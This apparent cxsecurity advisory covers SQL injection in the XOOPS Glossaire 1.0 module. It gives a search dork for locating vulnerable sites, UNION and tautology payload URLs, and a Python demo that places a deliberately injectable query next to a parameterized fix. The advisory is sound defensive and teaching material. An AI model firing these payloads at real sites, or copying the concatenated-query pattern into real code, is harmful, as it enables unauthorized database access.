XOOPS Glossaire 1.0 SQL Injection

2014.05.19
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Xoops Module (Glossaire v1.0) - SQL Injection Vulnerability
===================================================================
####################################################################
.:. Author  : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home    : http://www.iphobos.com/blog/
.:. Script  : http://www.xoops.org/
.:. Dork    : inurl:"/modules/glossaire/glossaire-aff.php"
####################################################################

VULNERABILITY
##############

[I] /modules/glossaire/glossaire-aff.php Line 19-27:

list($nbe) = $db->fetch_row($db->query("SELECT COUNT(*) FROM ".$db->prefix("glossaire")." WHERE affiche='O' AND lettre='$lettre' ORDER BY nom"));
OpenTable();
echo "<B>"._GLOSSAIRE."</B><br />\n";
$TableRep = $db->query("SELECT * FROM ".$db->prefix("glossaire")." WHERE affiche='O' AND lettre='$lettre' ORDER BY nom LIMIT $debut,$nb_affichage");
$top=1;
$topsuivant="glossaire-aff.php?rechercher&lettre=$lettre";

$lettre comes from the lettre request parameter (see the exploit URLs below) and is concatenated into both queries inside a single-quoted literal, with no escaping, quoting or type check. A quote in the parameter therefore closes the literal, and everything that follows it is executed as SQL.

#########
EXPLOIT
#########

Type: String MySQL Injection

http://SITE/modules/glossaire/glossaire-aff.php?lettre=A[SQL INJECTION]
http://SITE/modules/glossaire/glossaire-aff.php?lettre=A'+and+1=2+union+select+1,2,3,4,5,version()---

The second URL empties the legitimate result set with "and 1=2" and appends a UNION row whose last column is the MySQL version string; the number of selected values (six in this PoC) has to match the column count of the table behind SELECT * for the UNION to be accepted.
####################################################################
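The following is an added example, not code from the Glossaire module or from the advisory author. It models the two sides of the issue in Python over an in-memory SQLite database: a function that builds the query exactly the way the PHP above does (the value dropped into a single-quoted literal), run against payloads shaped like the PoC, beside the parameterized query that fixes it and an allow-list check on the letter. The table prefix, column list and sample rows are constructed for the demo; the real module's schema is not given on the page. sqlite_version() stands in for MySQL's version(), and the comment is written as "-- " with a trailing space, which both MySQL and SQLite accept.

```python
"""Vulnerable vs. parameterized glossaire-aff.php query, modelled in Python/sqlite3."""
import re
import sqlite3

PREFIX = "xoops_"  # stands in for $db->prefix(); configuration, not user input (assumed)

# Constructed sample rows. Five columns so that SELECT * lines up with the
# five-value UNION payload below, the way the PoC's six values must match the real table.
SAMPLE_ROWS = [
    (1, "Algorithme", "Suite finie d'operations", "A", "O"),
    (2, "Authentification", "Verification d'identite", "A", "O"),
    (3, "Audit", "Entree non publiee", "A", "N"),  # affiche='N': hidden by the app's own filter
    (4, "Base de donnees", "Ensemble structure de donnees", "B", "O"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        f"CREATE TABLE {PREFIX}glossaire "
        "(id INTEGER PRIMARY KEY, nom TEXT, definition TEXT, lettre TEXT, affiche TEXT)"
    )
    conn.executemany(f"INSERT INTO {PREFIX}glossaire VALUES (?,?,?,?,?)", SAMPLE_ROWS)
    return conn


def build_vulnerable_query(lettre, debut=0, nb_affichage=10):
    # Transliteration of the module's string building: the value lands inside a
    # single-quoted literal with no escaping, so a quote in the input ends the literal
    # and the rest of the input becomes SQL.
    return (
        f"SELECT * FROM {PREFIX}glossaire WHERE affiche='O' AND lettre='{lettre}' "
        f"ORDER BY nom LIMIT {debut},{nb_affichage}"
    )


def run_vulnerable(conn, lettre, debut=0, nb_affichage=10):
    return conn.execute(build_vulnerable_query(lettre, debut, nb_affichage)).fetchall()


# Payloads in the shape of the advisory's PoC (constructed for this demo).
# The tautology defeats the affiche='O' filter: AND binds tighter than OR, so the
# WHERE clause becomes (affiche='O' AND lettre='A') OR '1'='1'.
PAYLOAD_TAUTOLOGY = "A' OR '1'='1"
# The UNION form: "AND 1=2" empties the real result set, the UNION adds one attacker
# row whose last column is the DB version, and "-- " comments out the query's tail.
PAYLOAD_UNION = "A' AND 1=2 UNION SELECT 1,2,3,4,sqlite_version() -- "

LETTRE_RE = re.compile(r"^[A-Za-z]$")


def validate_lettre(lettre):
    """Allow-list check: a glossary index letter is exactly one ASCII letter."""
    return LETTRE_RE.match(lettre) is not None


def run_parameterized(conn, lettre, debut=0, nb_affichage=10):
    # The fix: the value travels as a bound parameter, never as SQL text, and the
    # paging values are cast to int. Only the configured prefix is still interpolated.
    sql = (
        f"SELECT * FROM {PREFIX}glossaire WHERE affiche='O' AND lettre=? "
        "ORDER BY nom LIMIT ? OFFSET ?"
    )
    return conn.execute(sql, (lettre, int(nb_affichage), int(debut))).fetchall()


def run_hardened(conn, lettre, debut=0, nb_affichage=10):
    """Defense in depth: reject anything that is not a single letter, then bind."""
    if not validate_lettre(lettre):
        raise ValueError("lettre must be a single letter")
    return run_parameterized(conn, lettre, debut, nb_affichage)


if __name__ == "__main__":
    conn = make_db()
    print("legit A      :", run_vulnerable(conn, "A"))               # the two published A entries
    print("tautology    :", run_vulnerable(conn, PAYLOAD_TAUTOLOGY))  # all four rows, hidden one included
    print("union        :", run_vulnerable(conn, PAYLOAD_UNION))      # one row ending in the SQLite version
    print("parameterized:", run_parameterized(conn, PAYLOAD_UNION))   # [] : payload is just an unmatched value
    print("hardened A   :", run_hardened(conn, "A"))
```

Run the file directly to see the three vulnerable results next to the parameterized one. Parameter binding alone is what closes the injection; the allow-list in run_hardened is the extra check a practitioner would add because a glossary index letter has a known shape, so anything longer than one character is an attack or a bug and deserves an error rather than an empty page.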


Copyright 2022, cxsecurity.com